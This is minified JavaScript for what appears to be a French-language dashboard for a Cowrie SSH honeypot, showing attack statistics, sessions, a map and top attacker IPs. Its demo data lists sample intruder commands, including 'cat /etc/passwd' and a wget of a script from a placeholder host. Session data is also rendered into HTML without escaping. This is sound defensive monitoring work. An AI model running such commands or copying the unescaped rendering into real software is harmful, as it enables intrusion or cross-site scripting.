const $=s=>document.querySelector(s);let map,markers=new Map(),refreshMs=15000;
const demo={stats:{total_attempts:1284,unique_ips:87,commands:642,malware_uploads:12,last_24h:214},sessions:[{session:'demo-ssh-01',src_ip:'45.76.12.44',country:'United States',last_seen:new Date().toISOString(),event_count:18,commands:['uname -a','whoami','cat /etc/passwd']},{session:'demo-ssh-02',src_ip:'185.220.101.4',country:'Germany',last_seen:new Date(Date.now()-3600000).toISOString(),event_count:11,commands:['ls -la','wget http://example.invalid/a.sh']},{session:'demo-ssh-03',src_ip:'103.75.201.8',country:'Singapore',last_seen:new Date(Date.now()-7200000).toISOString(),event_count:7,commands:['id','ps aux']}],top:{attackers:[{label:'45.76.12.44',count:98},{label:'185.220.101.4',count:76},{label:'103.75.201.8',count:61}]},timeline:Array.from({length:12},(_,i)=>({bucket:`2026-09-19T${String(i+8).padStart(2,'0')}:00`,count:8+i*3})),points:[{ip:'45.76.12.44',count:98,country:'United States',lat:37.1,lon:-95.7},{ip:'185.220.101.4',count:76,country:'Germany',lat:51.2,lon:10.4},{ip:'103.75.201.8',count:61,country:'Singapore',lat:1.35,lon:103.8}]};
function fmtDate(value){if(!value)return '—';return new Date(value).toLocaleString('fr-FR',{day:'2-digit',month:'2-digit',hour:'2-digit',minute:'2-digit'})}
const API_BASE='https://cowrie-dashboard-api.onrender.com'; async function get(url){const r=await fetch(API_BASE+url);if(!r.ok)throw new Error(await r.text());return r.json()}
function initMap(){map=L.map('map',{worldCopyJump:true,zoomControl:true}).setView([25,10],2);L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',{attribution:'© OpenStreetMap'}).addTo(map)}
async function loadStats(){let s;try{s=await get('/api/stats')}catch(e){s=demo.stats}$('#totalAttempts').textContent=s.total_attempts.toLocaleString('fr-FR');$('#uniqueIps').textContent=s.unique_ips.toLocaleString('fr-FR');$('#commands').textContent=s.commands.toLocaleString('fr-FR');$('#uploads').textContent=s.malware_uploads.toLocaleString('fr-FR');$('#last24h').textContent=`${s.last_24h.toLocaleString('fr-FR')} sur 24h`}
async function loadSessions(){let data;try{data=await get('/api/recent-sessions')}catch(e){data=demo.sessions}const body=$('#sessionsBody');body.innerHTML=data.map(s=>`<tr onclick="openSession('${encodeURIComponent(s.session)}')"><td>${s.src_ip}</td><td>${s.country||'Unknown'}</td><td>${fmtDate(s.last_seen)}</td><td>${s.event_count}</td></tr>`).join('')||'<tr><td colspan="4" class="empty">Aucune session</td></tr>'}
async function loadMap(){let data;try{data=await get('/api/map-points')}catch(e){data=demo.points}data.forEach(p=>{const popup=`<b>${p.ip}</b><br>${p.country||'Unknown'} · ${p.count} événement(s)`;if(markers.has(p.ip)){markers.get(p.ip).setRadius(Math.min(16,5+Math.log(p.count+1)*3)).bindPopup(popup);return}const marker=L.circleMarker([p.lat,p.lon],{radius:Math.min(16,5+Math.log(p.count+1)*3),color:'#5ee7d2',fillColor:'#5ee7d2',fillOpacity:.75,weight:1}).addTo(map).bindPopup(popup);markers.set(p.ip,marker);marker.setStyle({color:'#ff9b5f',fillColor:'#ff9b5f'});setTimeout(()=>marker.setStyle({color:'#5ee7d2',fillColor:'#5ee7d2'}),650)})}
async function loadTimeline(){let data;try{data=await get('/api/timeline?hours=24')}catch(e){data=demo.timeline}const max=Math.max(1,...data.map(x=>x.count));$('#timeline').innerHTML=data.map(x=>`<div class="bar" title="${x.bucket}: ${x.count}"><i style="height:${Math.max(3,x.count/max*145)}px"></i><small>${x.bucket.slice(11,13)}h</small></div>`).join('')}
async function loadTop(){let data;try{data=await get('/api/top-attackers')}catch(e){data=demo.top}$('#topAttackers').innerHTML=(data.attackers||[]).map((x,i)=>`<li><span class="rank">${String(i+1).padStart(2,'0')}</span><span class="rank-ip">${x.label}</span><span class="rank-count">${x.count}</span></li>`).join('')||'<li class="empty">Aucune donnée</li>'}
async function refresh(){await Promise.all([loadStats(),loadSessions(),loadMap(),loadTimeline(),loadTop()]);$('#statusText').textContent='Flux actif';$('#lastRefresh').textContent=fmtDate(new Date())}
async function openSession(id){let data;try{data=await get('/api/sessions/'+id)}catch(e){const s=demo.sessions.find(x=>x.session===decodeURIComponent(id));data={session:s?.session||id,src_ip:s?.src_ip||'demo',geo:{country:s?.country||'Demo'},events:(s?.commands||[]).map((input,i)=>({timestamp:new Date(Date.now()-i*60000).toISOString(),eventid:'cowrie.command.input',input}))}}$('#dialogTitle').textContent=`${data.session} · ${data.src_ip}`;$('#sessionDetail').innerHTML=`<div class="detail"><p class="eyebrow">${data.geo.country||'Unknown'} · ${data.events.length} ÉVÉNEMENTS</p>${data.events.map(e=>`<div class="event"><time>${fmtDate(e.timestamp)} · ${e.eventid||'event'}</time>${e.input?`<code>$ ${e.input}</code>`:`<code>${e.username||''} / ${e.password||''}</code>`}</div>`).join('')}</div>`;$('#sessionDialog').showModal()}
(async()=>{initMap();try{const c=await get('/api/config');refreshMs=(c.refresh_seconds||15)*1000;$('#refreshRate').textContent=c.refresh_seconds||15}catch(e){$('#statusText').textContent='Mode site statique';$('#refreshRate').textContent='30'}await refresh();setInterval(refresh,refreshMs);$('#refreshButton').onclick=refresh})()
